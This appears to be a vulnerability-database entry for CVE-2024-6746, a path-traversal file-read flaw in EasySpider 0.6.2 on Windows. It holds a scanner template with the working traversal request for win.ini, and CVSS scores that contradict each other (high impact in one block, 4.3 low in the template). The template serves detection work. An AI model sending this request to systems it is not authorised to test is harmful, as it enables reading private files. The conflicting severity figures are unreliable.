CVSS2
Attack Vector
ADJACENT_NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:A/AC:L/Au:N/C:P/I:N/A:N
CVSS3
Attack Vector
ADJACENT
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS4
Attack Vector
ADJACENT
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:L/SC:N/VI:N/SI:N/VA:N/SA:N
AI Score
Confidence
Low
A vulnerability classified as problematic was found in NaiboWang EasySpider 0.6.2 on Windows. Affected by this vulnerability is an unknown functionality of the file \EasySpider\resources\app\server.js of the component HTTP GET Request Handler. The manipulation with the input /../../../../../../../../../Windows/win.ini leads to path traversal: '../filedir'. The attack needs to be done within the local network.
id: CVE-2024-6746
info:
name: EasySpider 0.6.2 - Arbitrary File Read
author: securityforeveryone
severity: medium
description: |
A vulnerability classified as problematic was found in NaiboWang EasySpider 0.6.2 on Windows. Affected by this vulnerability is an unknown functionality of the file \EasySpider\resources\app\server.js of the component HTTP GET Request Handler. The manipulation with the input /../../../../../../../../../Windows/win.ini leads to path traversal: '../filedir'. The attack needs to be done within the local network.
reference:
- https://github.com/NaiboWang/EasySpider/issues/466
- https://cvefeed.io/vuln/detail/CVE-2024-6746
- https://vuldb.com/?id.271477
- https://vuldb.com/?submit.371998
- https://vuldb.com/?ctiid.271477
- https://github.com/NaiboWang/EasySpider
classification:
cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 4.3
cve-id: CVE-2024-6746
cwe-id: CWE-24
epss-score: 0.00045
epss-percentile: 0.1594
metadata:
vendor: naibowang
product: easyspider
tags: cve,cve2024,lfi,network
flow: http(1) && http(2)
http:
- raw:
- |
GET /taskGrid/tasklist.html HTTP/1.1
Host: {{Hostname}
matchers:
- type: dsl
dsl:
- 'contains_all(body,"Task List","Task ID","Task Name","URL","<title>ไปปๅกๅ่กจ | Task List</title>")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
GET /../../../../../../../../../Windows/win.ini HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_all(body,"bit app support","fonts","extensions")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100ab7c302013c663282ee437e7ce5cfa592e11d90859c17e5c5c31c26d09835df90220639425815d849a66a4d04b48ddf1f1e6d9e2fc6192ad6a31b20dc25ba8a1e81b:922c64590222798bb761d5b6d8e72950
CVSS2
Attack Vector
ADJACENT_NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:A/AC:L/Au:N/C:P/I:N/A:N
CVSS3
Attack Vector
ADJACENT
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS4
Attack Vector
ADJACENT
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:L/SC:N/VI:N/SI:N/VA:N/SA:N
AI Score
Confidence
Low